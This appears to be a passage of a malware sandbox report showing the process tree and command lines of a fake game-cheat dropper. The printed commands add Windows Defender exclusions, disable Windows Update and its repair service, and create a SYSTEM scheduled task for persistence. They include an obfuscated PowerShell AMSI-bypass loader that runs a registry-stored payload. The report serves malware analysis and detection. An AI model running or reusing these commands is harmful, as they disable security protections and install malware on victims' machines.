4340 conhost.exe cmd.exe PID 4308 wrote to memory of 1432 4308 conhost.exe cmd.exe PID 4308 wrote to memory of 1432 4308 conhost.exe cmd.exe PID 3596 wrote to memory of 1352 3596 cmd.exe powershell.exe PID 3596 wrote to memory of 1352 3596 cmd.exe powershell.exe PID 1432 wrote to memory of 2440 1432 cmd.exe sc.exe PID 1432 wrote to memory of 2440 1432 cmd.exe sc.exe PID 4308 wrote to memory of 1468 4308 conhost.exe cmd.exe PID 4308 wrote to memory of 1468 4308 conhost.exe cmd.exe PID 4308 wrote to memory of 1472 4308 conhost.exe cmd.exe PID 4308 wrote to memory of 1472 4308 conhost.exe cmd.exe PID 1468 wrote to memory of 1656 1468 cmd.exe sc.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:316 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5ea441e2-6fb5-4e6a-9501-c34b8879db7e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:428
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1120
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:vVkefQIUvQwC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AAQFOfJxLMpQUK,[Parameter(Position=1)][Type]$iCwjxecoMc)$jOfnizMJkQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$jOfnizMJkQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$AAQFOfJxLMpQUK).SetImplementationFlags('Runtime,Managed');$jOfnizMJkQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$iCwjxecoMc,$AAQFOfJxLMpQUK).SetImplementationFlags('Runtime,Managed');Write-Output $jOfnizMJkQb.CreateType();}$RWdfJfqcSOqwl=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$XtOHrAsMhQVPCC=$RWdfJfqcSOqwl.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RxQMonzJTZYvuAJuZlf=vVkefQIUvQwC @([String])([IntPtr]);$lIVeqidCFnkSzDFvrGZuwQ=vVkefQIUvQwC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jhOyDvGUFNp=$RWdfJfqcSOqwl.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$GIrXKKDTouyojI=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$jhOyDvGUFNp,[Object]('Load'+'LibraryA')));$KLaxLqgQheshZqDrx=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$jhOyDvGUFNp,[Object]('Vir'+'tual'+'Pro'+'tect')));$ldVmiTg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GIrXKKDTouyojI,$RxQMonzJTZYvuAJuZlf).Invoke('a'+'m'+'si.dll');$atXGZzrVcbonKTxog=$XtOHrAsMhQVPCC.Invoke($Null,@([Object]$ldVmiTg,[Object]('Ams'+'iSc'+'an'+'Buffer')));$hZEDmUcvGq=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLaxLqgQheshZqDrx,$lIVeqidCFnkSzDFvrGZuwQ).Invoke($atXGZzrVcbonKTxog,[uint32]8,4,[ref]$hZEDmUcvGq);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$atXGZzrVcbonKTxog,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KLaxLqgQheshZqDrx,$lIVeqidCFnkSzDFvrGZuwQ).Invoke($atXGZzrVcbonKTxog,[uint32]8,0x20,[ref]$hZEDmUcvGq);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3084 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3504
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YeocFvTjtgid{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$vzvlvLjQKVLmCw,[Parameter(Position=1)][Type]$LgmylDxtgV)$hUjRxOTTbMc=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$hUjRxOTTbMc.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$vzvlvLjQKVLmCw).SetImplementationFlags('Runtime,Managed');$hUjRxOTTbMc.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LgmylDxtgV,$vzvlvLjQKVLmCw).SetImplementationFlags('Runtime,Managed');Write-Output $hUjRxOTTbMc.CreateType();}$zgsSIaYIUXdHV=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$ghIXlKeIEmhFWZ=$zgsSIaYIUXdHV.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PFuejJVpaSVwPFaeurN=YeocFvTjtgid @([String])([IntPtr]);$GMAvUbPAXGggWCCVDeoDuq=YeocFvTjtgid @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HVecakmUUWL=$zgsSIaYIUXdHV.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$kizSwqqfCWLZrt=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$HVecakmUUWL,[Object]('Load'+'LibraryA')));$QRZIjIYJmupCrAEym=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$HVecakmUUWL,[Object]('Vir'+'tual'+'Pro'+'tect')));$VSOiJlE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kizSwqqfCWLZrt,$PFuejJVpaSVwPFaeurN).Invoke('a'+'m'+'si.dll');$hAQzEHSkdjoheqKbZ=$ghIXlKeIEmhFWZ.Invoke($Null,@([Object]$VSOiJlE,[Object]('Ams'+'iSc'+'an'+'Buffer')));$wBHwWyrcrB=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QRZIjIYJmupCrAEym,$GMAvUbPAXGggWCCVDeoDuq).Invoke($hAQzEHSkdjoheqKbZ,[uint32]8,4,[ref]$wBHwWyrcrB);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hAQzEHSkdjoheqKbZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QRZIjIYJmupCrAEym,$GMAvUbPAXGggWCCVDeoDuq).Invoke($hAQzEHSkdjoheqKbZ,[uint32]8,0x20,[ref]$wBHwWyrcrB);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1128
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1148
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1168
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1300
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1312
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1392
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1440
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1572
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1708
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1796
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2020
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1924
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2232
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2480
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2560
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2692
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3400
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620 -
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Users\Admin\AppData\Local\Temp\svchost.exeC:\Users\Admin\AppData\Local\Temp\svchost.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="6⤵
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE6⤵PID:220
-
C:\Windows\system32\sc.exesc stop wuauserv7⤵
- Launches sc.exe
PID:920 -
C:\Windows\system32\sc.exesc stop bits7⤵
- Launches sc.exe
PID:216 -
C:\Windows\system32\sc.exesc stop dosvc7⤵
- Launches sc.exe
PID:2536 -
C:\Windows\system32\sc.exesc stop UsoSvc7⤵
- Launches sc.exe
PID:4608 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:3392 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
- Launches sc.exe
PID:2608 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
- Launches sc.exe
PID:1736 -
C:\Windows\system32\sc.exesc config bits start= disabled7⤵
- Launches sc.exe
PID:4780 -
C:\Windows\system32\sc.exesc failure bits reset= 0 actions= ""7⤵
- Launches sc.exe
PID:1164 -
C:\Windows\system32\sc.exesc config dosvc start= disabled7⤵
- Launches sc.exe
PID:3508 -
C:\Windows\system32\sc.exesc failure dosvc reset= 0 actions= ""7⤵
- Launches sc.exe
PID:2440 -
C:\Windows\system32\sc.exesc config UsoSvc start= disabled7⤵
- Launches sc.exe
PID:4520 -
C:\Windows\system32\sc.exesc failure UsoSvc reset= 0 actions= ""7⤵
- Launches sc.exe
PID:4172 -
C:\Windows\system32\sc.exesc config wuauserv start= disabled7⤵
- Launches sc.exe
PID:5044 -
C:\Windows\system32\sc.exesc failure wuauserv reset= 0 actions= ""7⤵
- Launches sc.exe
PID:1280 -
C:\Windows\system32\takeown.exetakeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5088 -
C:\Windows\system32\icacls.exeicacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3284 -
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f7⤵PID:3152
-
C:\Windows\system32\reg.exereg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f7⤵PID:2884
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f7⤵PID:4840
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f7⤵PID:920
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f7⤵PID:3056
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f7⤵PID:2384
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE7⤵PID:4768
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE7⤵PID:2368
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE7⤵PID:3832
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE7⤵PID:4156
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE7⤵PID:4100
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE7⤵PID:4900
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵PID:1968
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
- Power Settings
PID:4100 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3056 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3016 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3296 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4156 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Drops file in Windows directory
PID:836 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"6⤵PID:4176
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:4556 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"6⤵PID:4100
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:4608 -
C:\Users\Admin\Chrome\updater.exeC:\Users\Admin\Chrome\updater.exe7⤵
- Executes dropped EXE
PID:1424 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"8⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
PID:1288 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="9⤵PID:3704
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:4996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2792 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add 